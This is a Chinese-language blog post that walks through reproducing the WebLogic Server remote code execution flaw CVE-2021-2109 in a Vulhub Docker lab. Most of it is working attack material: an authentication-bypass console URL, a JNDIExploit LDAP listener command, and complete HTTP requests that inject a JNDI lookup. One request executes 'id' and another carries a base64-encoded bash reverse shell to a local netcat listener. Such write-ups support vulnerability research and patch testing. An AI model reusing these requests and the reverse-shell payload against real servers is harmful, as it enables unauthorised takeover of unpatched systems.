CVE漏洞复现-CVE-2021-2109 Weblogic Server远程代码执行

CVE-2021-2109 Weblogic Server远程代码执行

漏洞背景


2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。该漏洞为Weblogic的远程代码执行漏洞,主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行,危险等级高。

漏洞影响版本


  • Weblogic Server 10.3.6.0.0

  • Weblogic Server 12.1.3.0.0

  • Weblogic Server 12.2.1.3.0

  • Weblogic Server 12.2.1.4.0

  • Weblogic Server 14.1.1.0.0

漏洞复现


环境搭建

使用Vulhub的CVE-2020-14882漏洞环境来复现,如下启动漏洞环境。

下载环境

docker-compose up -d

检查环境是否启动

docker ps

访问目标地址得到如下的页面:

使用CVE-2020-14882未授权访问登录后台,未授权URL地址:

http://192.168.106.6:7001/console/css/%252e%252e%252fconsole.portal

命令执行

开启JNDI监听

java -jar JNDIExploit-v1.11.jar -i 192.168.106.1(本机IP)

BP发送数据包

POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.106;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1      
Host: 192.168.106.6:7001      
Pragma: no-cache      
Cache-Control: no-cache      
Upgrade-Insecure-Requests: 1      
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36      
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9      
Accept-Encoding: gzip, deflate      
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8      
cmd:id      
Cookie: rememberMe=1; ADMINCONSOLESESSION=SHZ2XSBhINTtK05OkiYc3YmbENIp5MODNGWF7EaAje_adp2PQ58L!-286302025; rememberMe=1      
Connection: close

可以看到我们的命令执行成功了。

反弹shell

POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.106;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1      
Host: 192.168.106.6:7001      
Pragma: no-cache      
Cache-Control: no-cache      
Upgrade-Insecure-Requests: 1      
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36      
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9      
Accept-Encoding: gzip, deflate      
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8      
cmd:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwNi4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}      
Cookie: rememberMe=1; ADMINCONSOLESESSION=SHZ2XSBhINTtK05OkiYc3YmbENIp5MODNGWF7EaAje_adp2PQ58L!-286302025; rememberMe=1      
Connection: close

本机监听4444端口

netcat -lvp 4444

可以看到我们本机监听到了反弹shell,然后成功执行了我们的命令

posted @ 2023-06-06 19:11  私ははいしゃ敗者です  阅读(95)  评论(0编辑  收藏  举报  来源